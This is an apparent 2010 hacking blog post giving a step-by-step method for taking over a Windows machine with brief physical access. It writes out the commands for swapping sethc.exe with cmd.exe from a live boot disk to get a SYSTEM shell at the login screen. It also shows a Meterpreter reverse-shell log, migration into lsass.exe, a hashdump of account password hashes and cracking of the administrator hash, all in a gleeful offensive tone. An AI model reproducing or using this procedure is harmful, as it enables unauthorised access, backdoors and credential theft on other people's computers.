60seconds of physical access = p0wn3d windows machine

27 09 2010

So I came across some interesting articles about getting a shell with system priv on a windows box that you have physical access to …… sounds fun 😀

There are two ways to get this access using existing windows services, both involve replacing a helper service file with cmd.exe (or other exe, but we are just getting shell for now) and invoking the “helper” via key presses at the login screen.

Shift Key x5 – “Stickey keys helper”

Most windows machines (Up to & Including Server 2008 / Windows 7 etc) will invoke the StickyKeys helper app when you hit shift 5 times, even at the login prompt.

reboot your target with your favourite bootable image (backtrack is my choice, but you can use pretty much anything). Once you are in the distro of choice, you need to mount the target drive, backup the original file and copy in cmd.exe

Mount the drive (assuming its NTFS) and do the file copying

root@bt:~# mkdir disk
root@bt:~# ntfs-3g /dev/sda1 ./disk
root@bt:~# cd disk
root@bt:~/disk# cd WINDOWS/system32
root@bt:~/disk/WINDOWS/system32# mv sethc.exe sethc.exe.old
root@bt:~/disk/WINDOWS/system32# cp cmd.exe sethc.exe
root@bt:~/disk/WINDOWS/system32# cd
root@bt:~# umount ./disk
root@bt:~# reboot

Of course, while you are at it, you may want to drop your favourite “network tools application” somewhere onto the target drive, so you have something fun to run in a minute, you “could” also setup a machine on the same segment as the target, with a handler ….. but what you do there is up to you.

This time when you are at your windows login screen, hit Shift 5 time and bingo – shell, with system priv

Now comes the fun part … with your networktool.exe you dropped earlier….

Ooooh calculator …. wonder what that does ….

……. somewhere on another part of the network …… not so far far away ……

msf exploit(handler) >
[*] 172.16.189.137:1029 Request received for /Arf3V...
[*] 172.16.189.137:1029 Staging connection for target rf3V received...
[*] Patching Target ID rf3V into DLL
[*] 172.16.189.137:1030 Request received for /Brf3V...
[*] 172.16.189.137:1030 Stage connection for target rf3V received...
[*] Meterpreter session 2 opened (172.16.189.138:443 -> 172.16.189.137:1030) at 2010-09-27 21:35:10
+1000
[*] Session ID 2 (172.16.189.138:443 -> 172.16.189.137:1030) processing InitialAutoRunScript '/migrate.rb'
[*] Current server process: networktool.exe (996)
[*] Migrating to lsass.exe...
[*] Migrating into process ID 684
[*] New server process: lsass.exe (684)

msf exploit(handler) > sessions -l

Active sessions
===============

Id  Type                   Information
--  ----                   -----------
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ N00B-DB56488                                                   .137:1030

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:5c:38:31
IP Address  : 172.16.189.137
Netmask     : 255.255.255.0

meterpreter > sysinfo
Computer: N00B-DB56488C96
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ace3901423f8cc34767dbb3ebf316f88:b8491d9c56fc2d8caebdca5b86d96fee:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ff11f2628cb153e32a048dce2344c5ec:::
meterpreter >

Go Here: http://lmcrack.com/index.php

Enter captured hash: 921988ba001dc8e14a3b108f3fa6cb6d

Get Result: 921988BA001DC8E14A3B108F3FA6CB6D = P@ssw0rd

Login …… p0wn3d

Another way to achieve the same goal is with Utilman.exe & then using WindowsKey + U instead of Shift x5. Depending on the security settings locked down on the domain (GPOs) these may or may not work for you – only one way to find out.

Advertisements

Actions

Information

2 responses

11 04 2012
11 04 2012

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s




%d bloggers like this: